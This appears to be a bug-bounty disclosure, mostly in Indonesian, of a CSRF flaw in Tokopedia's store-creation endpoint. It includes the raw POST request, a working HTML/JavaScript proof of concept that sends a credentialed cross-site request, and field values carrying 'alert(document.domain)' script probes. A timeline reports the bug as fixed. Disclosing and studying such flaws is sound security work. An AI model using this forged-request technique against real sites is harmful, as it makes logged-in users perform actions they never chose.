Tokopedia - CSRF To Create New Store For New User
CSRF Issue On Tokopedia,
List of bug on Tokopedia :-
-
-
-
-
Saya menemukan sebuah bug CSRF di tokopedia
Pendahuluan
Bug ini untuk membuat toko baru di tokopedia, untuk user baru
Vuln Request:
POST /ajax/myshop.pl HTTP/1.1
Host: www.tokopedia.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Referer: https://www.tokopedia.com/myshop.pl
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 571
server_id=50&shop_name=tes3123123123t&tag_line=alert(document.domain);//&short_desc=alert(document.domain);//&sel-courier-city=3283&postal=67138&addr_street=&chk-courier-4-10=on&chk-courier-4-11=on&chk-courier-14-27=on&chck_pg_0=on&chck_pg_1=on&chck_pg_9=on&chck_pg_7=on&chck_pg_4=on&chck_pg_6=on&chck_pg_11=on&chck_pg_8=on&chck_pg_12=on&chck_pg_10=on&chck_pg_13=on&chck_pg_14=on&chck_pg_15=on&action=event_open_shop_validation&domain=testing123&shipment_ids={"4":{"10":1,"11":1},"14":{"27":1}}&payment_ids={}
Poc Code
<script>
function getMe(){
// retrieve page content
var xhr = new XMLHttpRequest();
// now execute the CSRF attack
xhr.open("POST", "https://www.tokopedia.com/ajax/myshop.pl", true);
xhr.withCredentials="true";
xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
xhr.send('server_id=50&shop_name=tes3123123123t&tag_line=alert(document.domain);//&short_desc=alert(document.domain);//&sel-courier-city=3283&postal=67138&addr_street=&chk-courier-4-10=on&chk-courier-4-11=on&chk-courier-14-27=on&chck_pg_0=on&chck_pg_1=on&chck_pg_9=on&chck_pg_7=on&chck_pg_4=on&chck_pg_6=on&chck_pg_11=on&chck_pg_8=on&chck_pg_12=on&chck_pg_10=on&chck_pg_13=on&chck_pg_14=on&chck_pg_15=on&action=event_open_shop_validation&domain=testing123&shipment_ids={"4":{"10":1,"11":1},"14":{"27":1}}&payment_ids={}');
}
</script>
<button onclick="getMe();">Let's Rock</button>
Bug ini bisa terjadi karena tidak ada verifikasi token untuk pembuatan toko
Step to reproduce:
- simpan poc code ke .html
- eksekusi kode,
- toko akan dibuat berdasarkan post
Jika membutuhkan video, saya upload di :
https://youtu.be/C0AJ9o9j5G0
Timeline:
- 7 April 2017 => Reporting
- 10 May => Fixing & Ask Document
- Waiting Bounty ( Will be edited )
Comments
Post a Comment